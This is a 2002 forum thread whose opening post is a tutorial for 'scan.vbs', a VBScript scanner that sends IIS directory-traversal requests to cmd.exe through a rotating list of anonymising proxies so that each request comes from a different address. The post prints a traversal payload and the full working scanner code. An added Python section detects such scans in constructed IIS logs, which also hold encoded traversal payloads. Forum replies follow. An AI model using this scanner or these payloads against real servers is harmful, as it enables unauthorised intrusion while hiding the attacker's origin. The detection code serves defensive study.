-
July 17th, 2002, 04:53 PM
#1
Cloaked Exploit Scanner II
Overview
This is a continuation of my article on writing a Cloaked exploit scanner. In the first part we created a file called 'livehosts' containing a list of responding anonymising proxy servers. In this article we will look at how to rotate through this file, connecting to a target server via a different proxy server for every request we make.
If you have not already read parts I - IV of this set of articles on the tcpUtil code please refer to these threads first before attempting the following:
Part I of this document
Scripting Internet Connections Under Window$
Search Engine submission 'exploit'
Google 'exploit' - TCPUtil pt III
The Exploit File
Requests that are to be passed through the proxy to a server are listed in the 'exploit' file. A sample exploit file is included in the zip file at the end of this article, but you could stuff this file with just about anything. The file contains the request URLs that the script will try to GET on the target machine via a proxy.
For example, the format of a simple traversal exploit would be as follows.
/.%2e/.%2e/winnt/system32/cmd.exe?/c+dir+c:\
The script will try each request line in turn, cycling through the list of proxies in the live hosts file.
Usage
Usage: scan.vbs [--Target|-t] Ip address or hostname of target
[--exploitfile|-e] file name to read exploit list from
[--proxyfile|-p] file name to read live proxies list from
[--Delay|-d] Page Time Out delay (in seconds) Default: 1 Seconds
[--Verbose|-v]
[--debug|-vv]
[--Help|-?]
An example
The command above scans www.ntsa.org.uk using the file exploit as the list of requests and livehosts as the list of live anonymising proxy servers. The command produces the output below. Notice that each request is made via a different proxy server. The Server Response is the return code from the server. If the return code is 200 (successful) then you have (in the examples) found a traversal to the command line.
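Seen from the server, the pattern described above is the same traversal request arriving from a different client address every time, with a 200 marking a hit; per-address rate limits never fire because no single address repeats. The following added example, which is not part of the original post or of NTSA's code, shows the defender's side: it parses a constructed IIS W3C extended log, decodes the `.%2e`, double-encoded and invalid-UTF-8 spellings of `..` to one canonical form, lists attempts and 200 responses, and reports whether the number of distinct sources inside a short window indicates proxy rotation rather than a single scanner. All function names, thresholds and log lines are constructed for this example.

```python
from datetime import datetime
from urllib.parse import unquote

# Constructed IIS W3C extended-format log lines (not taken from the original
# post).  The same traversal request arrives from a different client address
# each time, which is what a proxy-rotated scan looks like on the server.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2002-07-17 16:53:01 192.0.2.10 GET /default.htm - 200
2002-07-17 16:53:02 198.51.100.7 HEAD /.%2e/.%2e/winnt/system32/cmd.exe /c+dir+c:\\ 404
2002-07-17 16:53:03 198.51.100.23 HEAD /scripts/..%255c../winnt/system32/cmd.exe /c+dir+c:\\ 404
2002-07-17 16:53:04 203.0.113.5 HEAD /.%2e/.%2e/winnt/system32/cmd.exe /c+dir+c:\\ 200
2002-07-17 16:53:05 192.0.2.10 GET /images/logo.gif - 200
2002-07-17 16:53:06 203.0.113.77 HEAD /..%c0%af../winnt/system32/cmd.exe /c+dir+c:\\ 200
"""


def parse_w3c(text):
    """Parse W3C extended log text into dicts keyed by the #Fields names."""
    fields, records = None, []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):
            continue                      # #Software, #Date, ... directives
        if fields is None:
            raise ValueError("log entries before a #Fields directive")
        values = line.split()
        if len(values) != len(fields):
            continue                      # malformed line: skip, don't misalign
        records.append(dict(zip(fields, values)))
    return records


def normalise_uri(stem):
    """Decode percent-encoding until stable (so %255c -> %5c -> backslash),
    map backslashes to slashes and lower-case, so encoded variants compare equal."""
    current = stem
    for _ in range(3):
        decoded = unquote(current, errors="replace")
        if decoded == current:
            break
        current = decoded
    return current.replace("\\", "/").lower()


def is_traversal(stem):
    """True for a '..' path segment in any encoding, or for an invalid UTF-8
    sequence (it decodes to U+FFFD, which never occurs in a legitimate URL)."""
    norm = normalise_uri(stem)
    return ".." in norm.split("/") or "\ufffd" in norm


def max_sources_in_window(hits, window_seconds):
    """Largest number of distinct client addresses making traversal requests
    inside any window of window_seconds; hits must be sorted by time."""
    best, start = 0, 0
    for end in range(len(hits)):
        while (hits[end]["when"] - hits[start]["when"]).total_seconds() > window_seconds:
            start += 1
        best = max(best, len({h["ip"] for h in hits[start:end + 1]}))
    return best


def analyse(text, min_sources=3, window_seconds=60):
    """Summarise traversal activity: attempts, which ones the server answered
    with 200 (a hit), and whether the source addresses rotate fast enough to
    suggest a proxy list rather than a single scanner."""
    hits = []
    for r in parse_w3c(text):
        if is_traversal(r["cs-uri-stem"]):
            hits.append({
                "when": datetime.strptime(r["date"] + " " + r["time"], "%Y-%m-%d %H:%M:%S"),
                "ip": r["c-ip"],
                "sig": normalise_uri(r["cs-uri-stem"]),
                "status": int(r["sc-status"]),
            })
    hits.sort(key=lambda h: h["when"])
    return {
        "attempts": len(hits),
        "distinct_sources": sorted({h["ip"] for h in hits}),
        "successes": [(h["ip"], h["sig"]) for h in hits if h["status"] == 200],
        "rotated_scan": max_sources_in_window(hits, window_seconds) >= min_sources,
    }


if __name__ == "__main__":
    report = analyse(SAMPLE_LOG)
    print(f"traversal attempts: {report['attempts']} from {len(report['distinct_sources'])} addresses")
    for ip, sig in report["successes"]:
        print(f"  200 returned to {ip} for {sig}")
    print("rotated proxy scan:", report["rotated_scan"])
```

The two design points worth copying are canonicalising before matching (a rule that looks for the literal `.%2e` misses every other spelling of `..`) and correlating on the request rather than the client address: grouping traversal attempts over a time window, regardless of source, is what makes a rotated scan visible as one event instead of a handful of unrelated 404s.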
Registration of the sbwinsock control
You need to register the sbwinsock.ocx control provided in the zip file at the end of this post. To register the OCX component run the following command:
regsvr32 <path_to_OCX>\<component_name>.OCX
The Code!
Code:
'scan.vbs - Cloaked Traversal Scanner
'Program state: the response buffer and the flags set by the winsock event handlers
dim buffer,blncon,blnSkip,wtresp,secwait,blnLastcmdnull 'Program Vars
DIM blnbuff,blnifile,lang,sdelay,Verbose,debug,iFile,Ofile,str,Target,exploitfile,proxyfile 'User Vars
Dim oArgs, ArgNum 'Argument vars
Dim fso, tcpClient, host, port 'Objects and the proxy currently in use
Const sckTCPProtocol=0
Const sckUDPProtocol=1
'Output levels understood by the out() routine
const FlgDebug =1
const flgVerbose =2
const flgEcho =3
Const ForReading = 1
const ForWriting = 2

WScript.Echo "--Cloaked Traversal Scanner."
WScript.Echo "--July 2002 by NTSA."
WScript.Echo "--www.ntsa.org.uk"
WScript.Echo ""

'Create a FSO for file I/O operations
Set fso = CreateObject("Scripting.FileSystemObject")

'Create the winsock object and route its events to the wsPop_* handlers below
on error resume next
Set tcpClient=WScript.CreateObject("sbWinsck.winsock","wsPop_")
if err.number > 0 then
    out "Could not create an instance of the SBWinsck control.",flgEcho
    out "You need to register SBWinsck.ocx using the regsvr32",flgEcho
    out "command. (ie regsvr32 c:\path\sbWinsck.ocx where c:\path",flgEcho
    out "is the full path to the ocx file.",flgEcho
    wscript.quit(1)
end if

'Read the command line, then load the proxy and request lists.
'Both loaders return "<count>|<item>,<item>,..."
GetUserParams
sp = split (ProxyList,"|")
proxycount = cint(sp(0))
proxy = split(sp(1),",")
ex = split (ExploitList,"|")
Exploitcount = cint(ex(0))
Exploit = split(ex(1),",")
if proxycount = 0 or Exploitcount = 0 then
    out "The proxy file and the exploit file must each contain at least one entry.",flgEcho
    wscript.quit(1)
end if

'px indexes the proxy list; it advances by one for every request so that
'each request leaves through a different proxy, wrapping round at the end
px = 0
for n = 0 to Exploitcount -1
    sp = split(proxy(px),":")
    host = sp(0)
    port = sp(1)
    'A request sent to a proxy carries the absolute URL of the target
    str = "HEAD " & lcase("http://" & target & exploit(n)) & " HTTP/1.0"
    out "exploit: " & STR,flgecho
    out "Proxy: " & host,flgecho
    out "Port: " & port,flgecho
    tcpClient.Protocol = sckTCPProtocol
    tcpClient.RemoteHost = host
    tcpClient.RemotePort = port
    tcpClient.Connect
    'Poll in 250ms steps until connected, data has arrived or the delay expires
    tio = 0
    do until blncon = true or blnskip = true or tio = sdelay *2
        WSCRIPT.SLEEP 250
        out "Waiting for connection...",FlgDebug
        tio = tio + 1
    LOOP
    fail = false
    'Timed out - Could not connect
    if tio = sdelay *2 and blnskip =false then
        out "Could not connect to: " & tcpClient.RemoteHost & _
            " on port: " & tcpClient.RemotePort & ".",FlgEcho
        fail = true
    end if
    if fail = false then
        'Wait for the proxy to close the connection (or the delay to expire)
        tio = 0
        do until blncon = false or tio = sdelay *2
            WSCRIPT.SLEEP 500
            out "Waiting for disconnection...",FlgDebug
            tio = tio + 1
        loop
        'The status code is characters 10-12 of the status line, e.g. "HTTP/1.0 200 OK"
        out "Server Response> " & mid(buffer,10,3), Flgecho
    end if
    'Reset the connection state, then move on to the next proxy
    blncon = false
    blnskip = false
    buffer = ""
    tcpclient.disconnect
    px = px + 1
    if px > proxycount -1 then px = 0
    Set tcpClient=nothing
    Set tcpClient=WScript.CreateObject("sbWinsck.winsock","wsPop_")
next

'Read the live proxy list: one host:port per line, ended by a line holding "." or by EOF
function ProxyList
    dim cnt, line, list, livehosts
    cnt = 0
    list = ""
    Set livehosts = fso.OpenTextFile(proxyfile, ForReading)
    do while not livehosts.AtEndOfStream
        line = trim(livehosts.ReadLine)
        if line = "." then exit do
        if len(line) > 0 then
            list = list & line & ","
            cnt = cnt + 1
        end if
    loop
    livehosts.Close
    if cnt > 0 then list = left(list,len(list)-1)
    ProxyList = cstr(cnt) & "|" & list
end function

'Read the request list: one URL per line, ended by a line holding "." or by EOF
function ExploitList
    dim cnt, line, list, file
    cnt = 0
    list = ""
    Set file = fso.OpenTextFile(exploitfile, ForReading)
    do while not file.AtEndOfStream
        line = trim(file.ReadLine)
        if line = "." then exit do
        if len(line) > 0 then
            list = list & line & ","
            cnt = cnt + 1
        end if
    loop
    file.Close
    if cnt > 0 then list = left(list,len(list)-1)
    ExploitList = cstr(cnt) & "|" & list
end function

'Fired by the control when data arrives from the proxy
Sub wsPop_DataArrival(Byval b)
    dim strdata
    out "Data Arrival...",flgverbose
    'Get the data and add it to the buffer...
    tcpClient.GetData strData,vbstring
    if blnbuff = true then
        buffer = buffer & strdata
    else
        out strdata,Flgverbose
    end if
    'Data has just arrived - wait some
    'more to see if anything further comes
    secwait = 100
    blnskip = true
end sub

'Fired once the TCP connection to the proxy is up: send the request
Sub wsPop_Connected()
    blncon = true
    blnskip = true
    out "Connected...",flgverbose
    'sending data to the host
    out "Sending data...",flgverbose
    'The extra CRLF added by sendandlog ends the header block
    sendandlog str & vbcrlf
    out "Data sent.",flgverbose
End Sub

sub sendandlog(data)
    tcpclient.SendData data & vbCrLf
    LogDataSend(data)
end sub

'Echo the request in verbose mode (only for proxies on port 80)
sub LogDataSend(poststr)
    if clng(port) = 80 then
        out "Sending:> " & poststr,Flgverbose
    else
        'out "Sending:> " & poststr,FlgEcho
    end if
end sub

'Fired when the remote end closes the connection
Sub wsPop_Close()
    blncon = false
    out "Disconnected...",flgverbose
End Sub

'Strip the "--", "-" and "/" prefixes from a command line switch
function RemoveDel(str)
    RemoveDel = replace(str,"/","")
    RemoveDel = replace(RemoveDel,"-","")
end function

'True if a parameter was never set or is an empty string
'(named IsBlank so as not to shadow the built-in IsEmpty)
function IsBlank(str)
    if str & "" = "" then
        IsBlank = true
    else
        IsBlank = false
    end if
end function

'Count occurrences of the delimiter del in str, less one
function iCount(str,del)
    icount =0
    for i = 1 to len(str)
        if mid(str,i,1) = del then
            icount = icount +1
        end if
    next
    icount = icount - 1
end function

'Prompt on the console and return the line typed
function input(quest)
    WScript.StdOut.Write(quest & ":>")
    input = WScript.StdIn.ReadLine()
end function

'Print str if the current verbosity allows the level flg
sub out(str,flg)
    select case flg
        case flgEcho
            wscript.echo str
        case flgVerbose
            if verbose = true or debug = true then
                wscript.echo str
            end if
        case FlgDebug
            if debug = true then
                wscript.echo str
            end if
    end select
end sub

'Return the value following a switch, or show the usage if it is missing
function NextArg(flag)
    ArgNum = ArgNum + 1
    if ArgNum >= oArgs.Count then
        out "Error! " & flag & " requires a value.",FlgEcho
        out "",FlgEcho
        DisplayUsage
    end if
    NextArg = oArgs(ArgNum)
end function

'Parse the command line into the User Vars
sub GetUserParams
    dim value
    buffset = 0
    Set oArgs = WScript.Arguments
    ArgNum = 0
    While ArgNum < oArgs.Count
        Select Case RemoveDel(LCase(oArgs(ArgNum)))
            Case "exploitfile","e":
                value = NextArg("exploitfile")
                If (fso.FileExists(value)) Then
                    exploitfile = value
                else
                    out "Error! The file " & value & _
                        " was not found.",FlgEcho
                    out "",FlgEcho
                    displayusage
                    wscript.quit(1)
                end if
            Case "proxyfile","p":
                value = NextArg("proxyfile")
                If (fso.FileExists(value)) Then
                    proxyfile = value
                else
                    out "Error! The file " & value & _
                        " was not found.",FlgEcho
                    out "",FlgEcho
                    displayusage
                    wscript.quit(1)
                end if
            Case "target","t":
                Target = NextArg("target")
            Case "delay","d":
                sdelay = NextArg("delay")
            Case "help","?":
                Call DisplayUsage
            Case "verbose", "v":
                Verbose = true
            Case "debug","vv":
                debug = true
            Case Else:
                WScript.Echo "Unknown argument "& oArgs(ArgNum)
                Call DisplayUsage
                wscript.quit(1)
        End Select
        ArgNum = ArgNum + 1
    Wend
    blnbuff = true
    buffset = 1
    if IsBlank(sdelay) then
        'Set default as 1 second delay before breaking connection
        sdelay = 1
    end if
    if IsBlank(target) or IsBlank(exploitfile) or IsBlank(proxyfile) then
        out "A target host, a proxy file and exploit file are required.",flgecho
        DisplayUsage
        wscript.quit(1)
    else
        out "target> " & target,flgdebug
        out "exploitfile> " & exploitfile,flgdebug
        out "proxyfile> " & proxyfile,flgdebug
    end if
end sub

Sub DisplayUsage
    WScript.Echo "Usage: scan.vbs [--Target|-t] Ip address or hostname of target"
    WScript.Echo " [--exploitfile|-e] file name to read exploit list from"
    WScript.Echo " [--proxyfile|-p] file name to read live proxies list from"
    WScript.Echo " [--Delay|-d] Page Time Out delay " & _
        "(in seconds) Default: 1 Seconds"
    WScript.Echo " [--Verbose|-v]"
    WScript.Echo " [--debug|-vv]"
    WScript.Echo " [--Help|-?]"
    WScript.Echo ""
    WScript.Quit (1)
End Sub
If you enjoyed this thread you may enjoy these others:
Cloaked Exploit Scanner Part I and Part II
Google 'exploit' - TCPUtil pt III
Open Source FTP Control
Web based classes
Backing up the IIS metabase.
What port is that?
Building your own IDS tripwire.
Credit card security
Dumping SQL data to a text file
Hunting down skript kiddies
Search Engine submission 'exploit'
Forced shutdown of a remote nt/2k server
Securing an installation of IIS 4. (No, seriously)
Remote DSN Connections, using WinAPIs and the registry
Scripting Internet Connections Under Window$
"I may not agree with what you say, but I will defend to the death your right to say it."
Sir Winston Churchill.
-
July 21st, 2002, 02:18 AM
#2
aRRRRRRRRRRRRGh, another tut!
that's too many, too soon and containing too much for me, i narrowly averted a buffer overflow when i saw this in the forum.
is this stuff just bursting out of your head or what? can you not do something else to relieve the pressure? like knitting, its supposed to be relaxing. or at least just pretend to not know something and write a bad tut. remember, some people out here like to think they have a good understanding of the machine!...thanks for making sure that more people actually do understand...me included, naturally.
.maX
Hmm...there's something a little peculiar here. Oh i see what it is! the sentence is talking about itself! do you see that? what do you mean? sentences can't talk! No, but they REFER to things, and this one refers directly-unambiguously-unmistakably-to the very sentence which it is!
-
July 21st, 2002, 11:07 AM
#3
rofl.
Knitting sounds fun - but I doubt I'd be allowed any sharp objects.
"I may not agree with what you say, but I will defend to the death your right to say it."
Sir Winston Churchill.
-
July 21st, 2002, 04:00 PM
#4
man that is some poor internal documentation of code if I ever saw it, other than that good job.
Alternate realities celebrate reality. If you can't handle the reality you're in, then you won't be able to handle the one you're attempting to escape to.